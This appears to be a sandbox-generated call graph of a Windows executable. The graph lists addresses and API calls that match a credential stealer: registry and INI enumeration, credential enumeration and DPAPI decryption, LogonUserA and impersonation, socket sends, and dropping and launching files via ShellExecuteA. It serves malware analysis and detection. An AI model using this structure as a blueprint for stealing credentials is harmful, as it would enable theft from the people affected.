401c93 6 API calls 10440->10443 10441->10432 10441->10433 10441->10437 10441->10439 10442 404de7 StrStrIA 10441->10442 10445 404dfe 10441->10445 10442->10441 10443->10434 10443->10438 10443->10440 10444 404cb4 24 API calls 10443->10444 10446 4018a0 LocalFree 10443->10446 10444->10443 10448 4018a0 LocalFree 10445->10448 10460 404c9d 10445->10460 10446->10443 10448->10434 10450 401cf8 7 API calls 10449->10450 10451 404e55 10450->10451 10452 401c3f 5 API calls 10451->10452 10458 404e70 10451->10458 10454 404e67 10452->10454 10453 404cb4 31 API calls 10455 404e80 10453->10455 10456 4018a0 LocalFree 10454->10456 10457 4018a0 LocalFree 10455->10457 10456->10458 10459 404e88 10457->10459 10458->10453 10459->8773 10461 403ead 16 API calls 10460->10461 10462 404cb0 10461->10462 10462->10445 10464 405f88 10463->10464 10472 405db0 10463->10472 10464->8792 10465 405db7 RegEnumKeyExA 10466 405de0 RegCloseKey 10465->10466 10465->10472 10466->10464 10468 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10468->10472 10469 401bb8 6 API calls 10469->10472 10470 4018a0 LocalFree 10470->10472 10471 4015b3 lstrlenA 10471->10472 10472->10465 10472->10468 10472->10469 10472->10470 10472->10471 10474 401cf8 7 API calls 10473->10474 10483 404192 30 API calls 10482->10483 10484 405ac5 10483->10484 10485 404192 30 API calls 10484->10485 10486 405ada 10485->10486 10486->8819 10488 401cf8 7 API calls 10487->10488 10489 405c34 10488->10489 10490 405c86 10489->10490 10491 401c93 6 API calls 10489->10491 10490->8840 10492 405c43 10491->10492 10493 404192 30 API calls 10492->10493 10494 405c59 10493->10494 10495 404192 30 API calls 10494->10495 10496 405c6d 10495->10496 10497 404192 30 API calls 10496->10497 10498 405c81 10497->10498 10499 4018a0 LocalFree 10498->10499 10499->10490 10501 408c43 10500->10501 10510 408b78 10500->10510 10501->8850 10502 408b7f RegEnumKeyExA 10503 408ba8 RegCloseKey 10502->10503 10502->10510 10503->10501 10505 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10505->10510 10506 401bb8 6 API calls 10506->10510 10508 408b58 11 API calls 10508->10510 10509 4018a0 LocalFree 10509->10510 10510->10502 10510->10505 10510->10506 10510->10508 10510->10509 10526 403e84 10510->10526 10512 408d85 10511->10512 10521 408c67 10511->10521 10512->8854 10513 408c6e RegEnumKeyExA 10514 408c97 RegCloseKey 10513->10514 10513->10521 10514->10512 10516 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10516->10521 10517 401bb8 6 API calls 10517->10521 10518 402272 9 API calls 10518->10521 10519 4018a0 LocalFree 10519->10521 10520 401dc5 GetFileAttributesA 10522 408ceb 10520->10522 10521->10513 10521->10516 10521->10517 10521->10518 10521->10519 10521->10522 10523 408c47 39 API calls 10521->10523 10522->10520 10524 4018a0 LocalFree 10522->10524 10525 404192 30 API calls 10522->10525 10523->10521 10524->10521 10525->10522 10527 403ea9 10526->10527 10528 403e8d 10526->10528 10527->10510 10528->10527 10529 4015b3 lstrlenA 10528->10529 10529->10527 10531 40da05 10530->10531 10538 40d845 10530->10538 10531->8860 10532 40d84c RegEnumKeyExA 10533 40d875 RegCloseKey 10532->10533 10532->10538 10533->10531 10535 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10535->10538 10536 401bb8 6 API calls 10536->10538 10537 40d825 11 API calls 10537->10538 10538->10532 10538->10535 10538->10536 10538->10537 10539 4018a0 LocalFree 10538->10539 10540 4015b3 lstrlenA 10538->10540 10539->10538 10540->10538 10542 40d0f2 10541->10542 10547 40cebd 10541->10547 10542->8866 10543 40cec4 RegEnumKeyExA 10544 40ceed RegCloseKey 10543->10544 10543->10547 10544->10542 10546 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10546->10547 10547->10543 10547->10546 10548 401bb8 6 API calls 10547->10548 10549 40421d 2 API calls 10547->10549 10550 4018a0 LocalFree 10547->10550 10551 40ce9d 13 API calls 10547->10551 10552 4015b3 lstrlenA 10547->10552 10548->10547 10549->10547 10550->10547 10551->10547 10552->10547 10554 401bb8 6 API calls 10553->10554 10561 40d112 10554->10561 10555 40d181 10555->8870 10556 40d17c 10557 4018a0 LocalFree 10556->10557 10557->10555 10558 40d134 wsprintfA 10559 401bb8 6 API calls 10558->10559 10559->10561 10560 403ead 16 API calls 10560->10561 10561->10555 10561->10556 10561->10558 10561->10560 10562 4018a0 LocalFree 10561->10562 10562->10561 10564 401cf8 7 API calls 10563->10564 10565 405169 10564->10565 10566 405200 10565->10566 10567 401c3f 5 API calls 10565->10567 10566->8915 10568 405181 10567->10568 10569 405024 29 API calls 10568->10569 10570 405190 10569->10570 10571 4018a0 LocalFree 10570->10571 10572 405195 10571->10572 10573 401c3f 5 API calls 10572->10573 10574 4051a2 10573->10574 10575 405024 29 API calls 10574->10575 10576 4051b1 10575->10576 10577 4018a0 LocalFree 10576->10577 10578 4051b6 10577->10578 10579 401c3f 5 API calls 10578->10579 10593 401bb8 6 API calls 10592->10593 10595 404ffe 10593->10595 10594 405020 10594->8925 10595->10594 10596 4018a0 LocalFree 10595->10596 10596->10594 10598 405043 10597->10598 10599 40503e 10597->10599 10600 4018a0 LocalFree 10598->10600 10599->10598 10601 401c3f 5 API calls 10599->10601 10602 405157 10600->10602 10603 405053 10601->10603 10602->8912 10621 404fc3 10603->10621 10606 4018a0 LocalFree 10607 405062 10606->10607 10608 401c3f 5 API calls 10607->10608 10609 40506f 10608->10609 10610 405086 FindFirstFileA 10609->10610 10610->10598 10611 4050a5 10610->10611 10612 4050b3 lstrcmpiA 10611->10612 10613 405127 FindNextFileA 10611->10613 10615 4050cd lstrcmpiA 10612->10615 10618 4050cb 10612->10618 10613->10611 10614 405141 FindClose 10613->10614 10614->10598 10615->10618 10616 401c3f 5 API calls 10616->10618 10617 401c93 6 API calls 10617->10618 10618->10613 10618->10616 10618->10617 10619 404fc3 16 API calls 10618->10619 10620 4018a0 LocalFree 10618->10620 10619->10618 10620->10613 10622 403ead 16 API calls 10621->10622 10623 404fd6 10622->10623 10623->10606 10625 401cf8 7 API calls 10624->10625 10626 408a66 10625->10626 10627 408a79 10626->10627 10654 40891f 10626->10654 10627->8947 10630 4018a0 LocalFree 10630->10627 10632 4087ba 10631->10632 10634 4087b5 10631->10634 10633 4018a0 LocalFree 10632->10633 10635 40891b 10633->10635 10634->10632 10636 4087da 10634->10636 10637 4087cb 10634->10637 10635->8959 10639 401c3f 5 API calls 10636->10639 10638 401c3f 5 API calls 10637->10638 10640 4087d8 10638->10640 10639->10640 10641 4087fe FindFirstFileA 10640->10641 10641->10632 10655 408939 10654->10655 10656 40893e 10654->10656 10655->10656 10657 401c3f 5 API calls 10655->10657 10658 4018a0 LocalFree 10656->10658 10659 408950 10657->10659 10660 408a57 10658->10660 10661 408967 FindFirstFileA 10659->10661 10660->10630 10661->10656 10666 408986 10661->10666 10662 408a27 FindNextFileA 10664 408a41 FindClose 10662->10664 10662->10666 10663 408998 lstrcmpiA 10665 4089b2 lstrcmpiA 10663->10665 10663->10666 10664->10656 10665->10666 10666->10662 10666->10663 10667 401c3f 5 API calls 10666->10667 10668 401c93 6 API calls 10666->10668 10667->10666 10669 4089f4 StrStrIA 10668->10669 10670 408a22 10669->10670 10671 408a0f 10669->10671 10672 4018a0 LocalFree 10670->10672 10673 40879b 38 API calls 10671->10673 10672->10662 10673->10670 10765 401bb8 6 API calls 10764->10765 10766 40e6a3 10765->10766 10767 40e6c2 10766->10767 10771 40e63c 10766->10771 10767->8979 10770 4018a0 LocalFree 10770->10767 10778 40e606 10771->10778 10774 40e606 35 API calls 10775 40e66d 10774->10775 10776 40e606 35 API calls 10775->10776 10777 40e684 10776->10777 10777->10770 10779 401cf8 7 API calls 10778->10779 10780 40e611 10779->10780 10781 40e638 10780->10781 10782 401c93 6 API calls 10780->10782 10781->10774 10783 40e61e 10782->10783 10784 403fe7 30 API calls 10783->10784 10785 40e633 10784->10785 10786 4018a0 LocalFree 10785->10786 10786->10781 10788 40e3a0 10787->10788 10789 40e3a4 10787->10789 10788->8997 10798 4018b7 LocalAlloc 10789->10798 10791 40e3ae lstrlenA 10793 40e3d8 10791->10793 10794 40e3ed 10791->10794 10795 404192 30 API calls 10793->10795 10796 4018a0 LocalFree 10794->10796 10795->10794 10797 40e3f5 10796->10797 10797->8997 10798->10791 10800 40e1a7 10799->10800 10801 40e07f 10799->10801 10800->9010 10802 401bb8 6 API calls 10801->10802 10803 40e091 10802->10803 10804 401bb8 6 API calls 10803->10804 10805 40e0a6 10804->10805 10806 401bb8 6 API calls 10805->10806 10807 40e0bd 10806->10807 10808 401bb8 6 API calls 10807->10808 10809 40e0d2 10808->10809 10810 401bb8 6 API calls 10809->10810 10814 40e0e7 10810->10814 10811 40e177 10812 4018a0 LocalFree 10811->10812 10813 40e17f 10812->10813 10815 4018a0 LocalFree 10813->10815 10814->10811 10817 40421d 2 API calls 10814->10817 10816 40e187 10815->10816 10819 40e11a 10817->10819 10819->10811 10825 4015b3 lstrlenA 10819->10825 10826 40e148 10825->10826 10827 4015b3 lstrlenA 10826->10827 10833 40e270 10832->10833 10838 40e1cb 10832->10838 10833->9014 10834 40e1d2 RegEnumValueA 10835 40e200 RegCloseKey 10834->10835 10834->10838 10835->10833 10837 401bb8 6 API calls 10837->10838 10838->10834 10838->10837 10839 40e22d StrStrIA 10838->10839 10841 4018a0 LocalFree 10838->10841 10842 40df29 10838->10842 10839->10838 10841->10838 10843 401d7d 2 API calls 10842->10843 10844 40df38 10843->10844 10845 40df3c 10844->10845 10846 401e44 7 API calls 10844->10846 10845->10838 10847 40df4d 10846->10847 10858 40e05b 10847->10858 10862 4018b7 LocalAlloc 10847->10862 10849 40df76 StrStrA 10850 40df8a lstrlenA StrStrA 10849->10850 10852 40df85 10849->10852 10851 40dfaf lstrlenA 10850->10851 10850->10852 10853 40df5d 10851->10853 10855 4018a0 LocalFree 10852->10855 10853->10849 10853->10852 10859 40421d 2 API calls 10853->10859 10860 4018a0 LocalFree 10853->10860 10861 4015b3 lstrlenA 10853->10861 10863 402864 lstrlenA 10853->10863 10856 40e052 10855->10856 10857 401ed8 3 API calls 10856->10857 10857->10858 10858->10838 10859->10853 10860->10853 10861->10853 10862->10853 10866 4018b7 LocalAlloc 10863->10866 10865 402876 lstrcpyA 10865->10853 10866->10865 10884 4018b7 LocalAlloc 10867->10884 10869 40e837 RegOpenKeyA 10870 40e95f 10869->10870 10881 40e854 10869->10881 10871 4018a0 LocalFree 10870->10871 10873 40e96a 10871->10873 10872 40e85b RegEnumKeyExA 10874 40e884 RegCloseKey 10872->10874 10872->10881 10873->9020 10874->10870 10876 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10876->10881 10877 401bb8 6 API calls 10877->10881 10878 401c3f 5 API calls 10880 40e8e5 GetPrivateProfileStringA 10878->10880 10879 40e824 34 API calls 10879->10881 10880->10881 10881->10872 10881->10876 10881->10877 10881->10878 10881->10879 10882 4018a0 LocalFree 10881->10882 10883 404192 30 API calls 10881->10883 10882->10881 10883->10881 10884->10869 10886 40f542 10885->10886 10887 40f528 10885->10887 10889 40f138 RegOpenKeyA 10886->10889 10887->10886 10909 40a298 10887->10909 10890 40f1d3 10889->10890 10898 40f154 10889->10898 10890->9030 10891 40f15b RegEnumKeyExA 10892 40f184 RegCloseKey 10891->10892 10891->10898 10892->10890 10894 401c3f 5 API calls 10894->10898 10895 401c93 6 API calls 10895->10898 10897 4018a0 LocalFree 10897->10898 10898->10891 10898->10894 10898->10895 10898->10897 10922 40efa3 10898->10922 10900 40f27d 10899->10900 10906 40f1f7 10899->10906 10900->9034 10901 40f1fe RegEnumKeyExA 10902 40f227 RegCloseKey 10901->10902 10901->10906 10902->10900 10904 401c3f 5 API calls 10904->10906 10905 401c93 6 API calls 10905->10906 10906->10901 10906->10904 10906->10905 10907 40f138 23 API calls 10906->10907 10908 4018a0 LocalFree 10906->10908 10907->10906 10908->10906 10911 40a2b8 10909->10911 10910 40a30d 10910->10886 10911->10910 10913 40a202 10911->10913 10915 40a225 10913->10915 10914 40a282 10914->10911 10915->10914 10917 40a17c 10915->10917 10918 40a189 10917->10918 10920 40a18e 10917->10920 10918->10915 10919 40a1f2 10919->10915 10920->10919 10921 40a1e1 CoTaskMemFree 10920->10921 10921->10920 10924 40efb3 10922->10924 10923 401bb8 6 API calls 10923->10924 10924->10923 10927 4018a0 LocalFree 10924->10927 10930 40efef 10924->10930 10941 40ef59 10924->10941 10926 401bb8 6 API calls 10926->10930 10927->10924 10928 4015b3 lstrlenA 10928->10930 10929 401bb8 6 API calls 10935 40f046 10929->10935 10930->10926 10930->10928 10931 4018a0 LocalFree 10930->10931 10930->10935 10931->10930 10932 4018a0 LocalFree 10932->10935 10933 401bb8 6 API calls 10939 40f0c7 10933->10939 10934 40421d 2 API calls 10934->10935 10935->10929 10935->10932 10935->10934 10937 40ef59 6 API calls 10935->10937 10935->10939 10936 40f11e 10936->10898 10937->10935 10938 4015b3 lstrlenA 10938->10939 10939->10933 10939->10936 10939->10938 10940 4018a0 LocalFree 10939->10940 10940->10939 10950 402902 10941->10950 10943 40ef9a 10943->10924 10944 40ef6a 10944->10943 10945 4015b3 lstrlenA 10944->10945 10946 40ef87 10945->10946 10947 4015b3 lstrlenA 10946->10947 10948 40ef92 10947->10948 10949 4018a0 LocalFree 10948->10949 10949->10943 10951 402911 10950->10951 10952 40290b 10950->10952 10951->10944 10952->10951 10953 402917 IsTextUnicode 10952->10953 10954 402938 10953->10954 10955 402928 10953->10955 10969 4018b7 LocalAlloc 10954->10969 10959 402885 10955->10959 10958 402936 10958->10944 10960 402892 10959->10960 10961 402899 WideCharToMultiByte 10959->10961 10960->10958 10962 4028b6 10961->10962 10968 4028e8 10961->10968 10970 4018b7 LocalAlloc 10962->10970 10964 4028c1 10965 4028c5 WideCharToMultiByte 10964->10965 10964->10968 10965->10968 10968->10958 10969->10958 10970->10964 10971->9060 10972->9069 10974 407f5a 10973->10974 10983 407d66 10973->10983 10974->9088 10975 407d6d RegEnumKeyExA 10976 407d96 RegCloseKey 10975->10976 10975->10983 10976->10974 10978 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10978->10983 10979 401bb8 6 API calls 10979->10983 10980 4018a0 LocalFree 10980->10983 10981 4015b3 lstrlenA 10981->10983 10982 407d46 11 API calls 10982->10983 10983->10975 10983->10978 10983->10979 10983->10980 10983->10981 10983->10982 10985 407c56 10984->10985 10991 407a14 10984->10991 10985->9120 10986 407a1b RegEnumKeyExA 10987 407a44 RegCloseKey 10986->10987 10986->10991 10987->10985 10989 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 10989->10991 10990 401bb8 6 API calls 10990->10991 10991->10986 10991->10989 10991->10990 10992 4079f4 11 API calls 10991->10992 10993 4015b3 lstrlenA 10991->10993 10994 4018a0 LocalFree 10991->10994 10992->10991 10993->10991 10994->10991 10996 40ecd5 10995->10996 11004 40e9ee 10995->11004 10996->9126 10997 40e9f5 RegEnumKeyExA 10998 40ea1e RegCloseKey 10997->10998 10997->11004 10998->10996 11000 401c3f 5 API calls 11000->11004 11001 401c93 6 API calls 11001->11004 11002 401bb8 6 API calls 11002->11004 11003 40e9ce 15 API calls 11003->11004 11004->10997 11004->11000 11004->11001 11004->11002 11004->11003 11005 4015b3 lstrlenA 11004->11005 11006 4018a0 LocalFree 11004->11006 11005->11004 11006->11004 11008 401cf8 7 API calls 11007->11008 11009 408e18 11008->11009 11010 408e55 11009->11010 11011 401c93 6 API calls 11009->11011 11010->9132 11012 408e27 11011->11012 11013 404192 30 API calls 11012->11013 11014 408e3c 11013->11014 11015 404192 30 API calls 11014->11015 11016 408e50 11015->11016 11017 4018a0 LocalFree 11016->11017 11017->11010 11019 406752 11018->11019 11029 4064f3 11018->11029 11019->9143 11020 4064fa RegEnumKeyExA 11021 406523 RegCloseKey 11020->11021 11020->11029 11021->11019 11023 401c3f 5 API calls 11023->11029 11024 401c93 6 API calls 11024->11029 11025 401bb8 6 API calls 11025->11029 11026 4018a0 LocalFree 11026->11029 11027 40421d 2 API calls 11027->11029 11028 4015b3 lstrlenA 11028->11029 11029->11020 11029->11023 11029->11024 11029->11025 11029->11026 11029->11027 11029->11028 11031 4048d2 11030->11031 11038 40477f 11030->11038 11031->9154 11032 404786 RegEnumKeyExA 11033 4047af RegCloseKey 11032->11033 11032->11038 11033->11031 11035 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 11035->11038 11036 401bb8 6 API calls 11036->11038 11037 4018a0 LocalFree 11037->11038 11038->11032 11038->11035 11038->11036 11038->11037 11039 40475c 11 API calls 11038->11039 11040 4015b3 lstrlenA 11038->11040 11039->11038 11040->11038 11042 404758 11041->11042 11048 404671 11041->11048 11042->9160 11043 404678 RegEnumValueA 11044 4046a6 RegCloseKey 11043->11044 11043->11048 11044->11042 11046 4046c2 StrStrIA 11046->11048 11047 401bb8 6 API calls 11047->11048 11048->11043 11048->11046 11048->11047 11049 4018a0 LocalFree 11048->11049 11049->11048 11051 40a77e 11050->11051 11053 40a6d4 11050->11053 11057 40a798 11051->11057 11052 40a736 StrStrIW 11052->11053 11053->11051 11053->11052 11066 40a54c lstrlenW 11053->11066 11055 40a766 CoTaskMemFree 11055->11053 11056 40a774 CoTaskMemFree 11055->11056 11056->11053 11058 40a7a8 11057->11058 11059 40a8ce 11058->11059 11060 40a7ed CredEnumerateA 11058->11060 11059->9169 11060->11059 11061 40a818 11060->11061 11061->11059 11062 40a8c5 CredFree 11061->11062 11063 40a834 lstrlenW CryptUnprotectData 11061->11063 11064 40a8a7 LocalFree 11061->11064 11092 40a35c 11061->11092 11062->11059 11063->11061 11064->11061 11067 40a55f 11066->11067 11073 40a564 11066->11073 11067->11055 11068 40a5c2 wsprintfA 11070 401c93 6 API calls 11068->11070 11069 40a595 wsprintfA 11071 401c93 6 API calls 11069->11071 11072 40a5e9 11070->11072 11071->11073 11074 401bb8 6 API calls 11072->11074 11073->11068 11073->11069 11075 40a603 11074->11075 11076 40a6a2 11075->11076 11078 40a618 lstrlenW 11075->11078 11079 40a69a 11075->11079 11077 4018a0 LocalFree 11076->11077 11081 40a6aa 11077->11081 11078->11079 11082 40a64a CryptUnprotectData 11078->11082 11080 4018a0 LocalFree 11079->11080 11080->11076 11081->11055 11082->11079 11083 40a668 11082->11083 11083->11079 11086 40a323 11083->11086 11090 401551 11086->11090 11088 40a331 lstrlenW 11091 401562 11090->11091 11091->11088 11093 401551 11092->11093 11094 40a36a lstrlenA 11093->11094 11095 40a37f 11094->11095 11095->11064 11097 401cf8 7 API calls 11096->11097 11098 40d79b 11097->11098 11099 40d7c8 11098->11099 11100 401c93 6 API calls 11098->11100 11099->9223 11101 40d7aa 11100->11101 11102 403fe7 30 API calls 11101->11102 11103 40d7c3 11102->11103 11104 4018a0 LocalFree 11103->11104 11104->11099 11106 40dcc2 11105->11106 11115 40daad 11105->11115 11106->9245 11107 40dab4 RegEnumKeyExA 11108 40dadd RegCloseKey 11107->11108 11107->11115 11108->11106 11109 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 11109->11115 11111 401bb8 6 API calls 11111->11115 11112 40da8d 11 API calls 11112->11115 11113 4015b3 lstrlenA 11113->11115 11114 4018a0 LocalFree 11114->11115 11115->11107 11115->11109 11115->11111 11115->11112 11115->11113 11115->11114 11831 40b712 11832 40b855 11831->11832 11833 4018a0 LocalFree 11832->11833 11834 40b85d 11833->11834 11154 401216 CreateFileA 11155 401231 11154->11155 11156 401235 ReadFile 11154->11156 11157 401253 CloseHandle 11156->11157 11158 401261 11156->11158 11158->11156 11159 401279 CloseHandle 11158->11159 11215 40f999 11222 401770 GetHGlobalFromStream 11215->11222 11217 40f9a4 11218 40263e 18 API calls 11217->11218 11220 40f9b9 11218->11220 11219 40f9df 11220->11219 11221 4018a0 LocalFree 11220->11221 11221->11219 11223 401786 11222->11223 11224 4017b1 11222->11224 11225 40178e GlobalLock 11223->11225 11224->11217 11225->11224 11226 40179d 11225->11226 11227 4022de 2 API calls 11226->11227 11228 4017a9 GlobalUnlock 11227->11228 11228->11224 11510 402a1f 11511 402a29 11510->11511 11513 402a41 11511->11513 11514 4027af 11511->11514 11515 4027d1 11514->11515 11516 4027bf 11514->11516 11515->11511 11516->11515 11517 4027d8 LookupPrivilegeValueA 11516->11517 11518 4027f4 GetCurrentProcess OpenProcessToken 11517->11518 11519 40284e 11517->11519 11522 402835 AdjustTokenPrivileges 11518->11522 11523 40280c 11518->11523 11520 402855 CloseHandle 11519->11520 11521 40285d 11519->11521 11520->11521 11521->11511 11522->11519 11523->11522 11116 4102e0 SetUnhandledExceptionFilter 11117 4102ed 11116->11117 11126 40f83b 11117->11126 11119 4102f2 11120 410314 11119->11120 11121 41030e RevertToSelf 11119->11121 11131 40ff3a 11120->11131 11121->11120 11123 410323 11137 410042 11123->11137 11125 410328 11127 40f84c 11126->11127 11128 40f84d 11126->11128 11127->11119 11129 40f864 GetTickCount 11128->11129 11130 40f884 11128->11130 11129->11128 11130->11119 11132 40ff4b 11131->11132 11135 40ff4c 11131->11135 11132->11123 11133 40ff5f 11133->11123 11134 4028f1 LocalFree LocalAlloc WideCharToMultiByte WideCharToMultiByte 11134->11135 11135->11133 11135->11134 11153 4018b7 LocalAlloc 11135->11153 11138 410054 11137->11138 11148 410055 11137->11148 11138->11125 11139 410068 11139->11125 11140 410087 lstrcmpiA 11141 41009e LogonUserA 11140->11141 11140->11148 11141->11148 11142 41014d LoadUserProfileA 11142->11148 11143 402864 3 API calls 11144 4100cc lstrlenA LCMapStringA 11143->11144 11146 4100f2 LogonUserA 11144->11146 11144->11148 11145 4101b2 ImpersonateLoggedOnUser 11145->11148 11146->11148 11147 4018a0 LocalFree 11147->11148 11148->11139 11148->11140 11148->11141 11148->11142 11148->11143 11148->11145 11148->11147 11149 4101e3 UnloadUserProfile 11148->11149 11150 4101ee CloseHandle 11148->11150 11151 41012a LogonUserA 11148->11151 11152 4101cd RevertToSelf 11148->11152 11149->11150 11150->11148 11151->11142 11151->11148 11152->11148 11153->11135 11553 40ba61 11554 40ba78 11553->11554 11555 40ba6f 11553->11555 11555->11554 11556 40baf3 CryptUnprotectData 11555->11556 11556->11554 11557 40bb26 11556->11557 11557->11554 11558 40bb4a LocalFree 11557->11558 11558->11554 11559 40bb62 11558->11559 11559->11554 11568 4018b7 LocalAlloc 11559->11568 11561 40bb7e 11562 40bb8f lstrlenA StrCmpNIA 11561->11562 11563 40bbc3 11562->11563 11564 40bbab lstrlenA StrCmpNIA 11562->11564 11565 40bbc7 lstrlenA StrCmpNIA 11563->11565 11567 40bbdf 11563->11567 11564->11563 11565->11567 11566 4018a0 LocalFree 11566->11554 11567->11566 11568->11561 11229 40fbec 11230 40fdc5 11229->11230 11235 40fbfa 11229->11235 11232 401770 5 API calls 11232->11235 11233 40fc38 wsprintfA 11234 401c93 6 API calls 11233->11234 11234->11235 11235->11230 11235->11232 11235->11233 11236 4018a0 LocalFree 11235->11236 11237 40fcb5 GetTempPathA 11235->11237 11238 40fcd9 GetTickCount wsprintfA CreateDirectoryA 11235->11238 11247 403bae 11235->11247 11236->11235 11237->11235 11242 40fd0d 11238->11242 11239 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 11239->11242 11240 401c93 6 API calls 11240->11242 11242->11239 11242->11240 11243 40fd5f lstrlenA 11242->11243 11244 4018a0 LocalFree 11242->11244 11255 40144b CreateFileA 11242->11255 11245 402524 19 API calls 11243->11245 11244->11235 11246 40fd7a ShellExecuteA 11245->11246 11246->11242 11248 403bbb 11247->11248 11261 403a40 11248->11261 11251 403a40 24 API calls 11252 403bea 11251->11252 11253 4018a0 LocalFree 11252->11253 11254 403bf3 11253->11254 11254->11235 11256 4014c7 11255->11256 11260 401474 11255->11260 11256->11242 11257 4014a4 11258 4014bf CloseHandle 11257->11258 11258->11256 11259 40140a WriteFile 11259->11260 11260->11257 11260->11258 11260->11259 11288 4018b7 LocalAlloc 11261->11288 11263 403a54 11289 4018b7 LocalAlloc 11263->11289 11265 403a61 11290 4018b7 LocalAlloc 11265->11290 11267 403a6e InternetCrackUrlA 11268 403ab5 11267->11268 11281 403abb 11267->11281 11269 403ac0 InternetCreateUrlA 11268->11269 11268->11281 11270 403ae5 InternetCrackUrlA 11269->11270 11269->11281 11272 403b26 11270->11272 11270->11281 11271 4018a0 LocalFree 11273 403b96 11271->11273 11274 403b2e wsprintfA 11272->11274 11272->11281 11275 4018a0 LocalFree 11273->11275 11291 403641 socket 11274->11291 11276 403b9e 11275->11276 11278 4018a0 LocalFree 11276->11278 11280 403ba6 11278->11280 11280->11251 11280->11254 11281->11271 11282 403b59 lstrlenA 11299 4036c5 11282->11299 11284 403b70 11285 403b74 closesocket 11284->11285 11304 4038b9 11284->11304 11285->11281 11288->11263 11289->11265 11290->11267 11292 40365a 11291->11292 11293 40365c 11291->11293 11292->11281 11292->11282 11295 40368f 11293->11295 11296 403607 2 API calls 11293->11296 11298 40367e 11293->11298 11294 4036a2 connect 11294->11292 11297 4036b6 closesocket 11294->11297 11295->11297 11296->11298 11297->11292 11298->11294 11298->11295 11300 4036d0 11299->11300 11301 4036db 11299->11301 11300->11284 11302 4036e3 send 11301->11302 11303 403700 11301->11303 11302->11301 11302->11303 11303->11284 11405 41022f OleInitialize 11423 402377 11405->11423 11408 40f83b GetTickCount 11409 41023e 11408->11409 11440 402a46 11409->11440 11411 410248 11424 40231d 2 API calls 11423->11424 11425 402386 11424->11425 11426 40231d 2 API calls 11425->11426 11427 402395 11426->11427 11428 40231d 2 API calls 11427->11428 11429 4023a4 11428->11429 11430 40231d 2 API calls 11429->11430 11431 4023b3 11430->11431 11432 40231d 2 API calls 11431->11432 11433 4023c2 11432->11433 11434 40231d 2 API calls 11433->11434 11435 4023d1 11434->11435 11436 40231d 2 API calls 11435->11436 11437 4023e0 11436->11437 11438 40231d 2 API calls 11437->11438 11439 4023ef 11438->11439 11439->11408 11441 402a57 11440->11441 11442 402a58 11440->11442 11441->11411 11443 402a74 11442->11443 11444 402a79 GetCurrentProcess OpenProcessToken 11442->11444 11443->11411 11884 40c3b2 11885 40c3c1 11884->11885 11886 40c3c5 MultiByteToWideChar 11884->11886 11896 4018b7 LocalAlloc 11886->11896 11888 40c3e2 MultiByteToWideChar StgOpenStorage 11889 40c48b 11888->11889 11892 40c416 11888->11892 11890 4018a0 LocalFree 11889->11890 11891 40c4a6 11890->11891 11892->11889 11897 4018b7 LocalAlloc 11892->11897 11894 40c44b 11895 4018a0 LocalFree 11894->11895 11895->11889 11896->11888 11897->11894 11160 40f9f8 11161 40fa00 11160->11161 11173 40fa14 11161->11173 11174 4017bd GetHGlobalFromStream 11161->11174 11163 40fa2c 11163->11173 11188 40165d GetHGlobalFromStream 11163->11188 11165 40fa3a 11165->11173 11194 4016c3 GetHGlobalFromStream 11165->11194 11167 40fa48 11167->11173 11202 401a0f GetHGlobalFromStream 11167->11202 11169 40fa5b 11170 40165d 3 API calls 11169->11170 11169->11173 11171 40fa69 11170->11171 11172 4016c3 3 API calls 11171->11172 11171->11173 11172->11173 11175 401891 11174->11175 11176 4017da 11174->11176 11175->11163 11177 4017e2 GlobalLock 11176->11177 11177->11175 11178 4017f5 11177->11178 11212 4018b7 LocalAlloc 11178->11212 11180 40180e 11213 4018b7 LocalAlloc 11180->11213 11182 401827 11183 40183d GlobalUnlock 11182->11183 11184 401853 11183->11184 11185 4018a0 LocalFree 11184->11185 11186 401889 11185->11186 11187 4018a0 LocalFree 11186->11187 11187->11175 11189 4016a7 11188->11189 11190 40167a 11188->11190 11189->11165 11191 401682 GlobalLock 11190->11191 11191->11189 11192 401691 11191->11192 11193 40169c GlobalUnlock 11192->11193 11193->11189 11195 4016e0 11194->11195 11196 40172d 11194->11196 11197 4016f1 GlobalLock 11195->11197 11198 40171d 11195->11198 11196->11167 11199 401701 11197->11199 11201 401733 11197->11201 11198->11167 11200 40170c GlobalUnlock 11199->11200 11200->11201 11201->11167 11203 401ac5 11202->11203 11204 401a2f 11202->11204 11203->11169 11205 401a37 GlobalLock 11204->11205 11205->11203 11206 401a46 11205->11206 11214 4018b7 LocalAlloc 11206->11214 11208 401a51 11209 401a62 GlobalUnlock lstrlenA 11208->11209 11210 401a82 11209->11210 11211 4018a0 LocalFree 11210->11211 11211->11203 11212->11180 11213->11182 11214->11208 11336 40fafc 11345 403e3c WSAStartup 11336->11345 11338 40fbc7 11339 40fbb3 11339->11338 11340 402524 19 API calls 11339->11340 11340->11338 11342 40fb01 11342->11338 11342->11339 11344 40fb92 Sleep 11342->11344 11346 403dd8 11342->11346 11355 40f8ad 11342->11355 11344->11342 11345->11342 11347 403e2d 11346->11347 11348 403de7 11346->11348 11347->11342 11348->11347 11349 403ded GetHGlobalFromStream 11348->11349 11349->11347 11350 403dfd 11349->11350 11351 403e05 GlobalLock 11350->11351 11351->11347 11352 403e14 11351->11352 11368 403c26 11352->11368 11356 40f8be 11355->11356 11357 40f8bf GetHGlobalFromStream 11355->11357 11356->11342 11358 40f8d9 11357->11358 11359 40f90e 11357->11359 11404 4018b7 LocalAlloc 11358->11404 11360 40f93a 11359->11360 11361 40f91c StrStrIA 11359->11361 11360->11342 11364 40f92d 11361->11364 11363 40f8eb GlobalLock 11363->11359 11365 40f8fa 11363->11365 11366 4018a0 LocalFree 11364->11366 11367 40f906 GlobalUnlock 11365->11367 11366->11360 11367->11359 11400 4018b7 LocalAlloc 11368->11400 11370 403c41 11401 4018b7 LocalAlloc 11370->11401 11372 403c4e 11402 4018b7 LocalAlloc 11372->11402 11374 403c5b 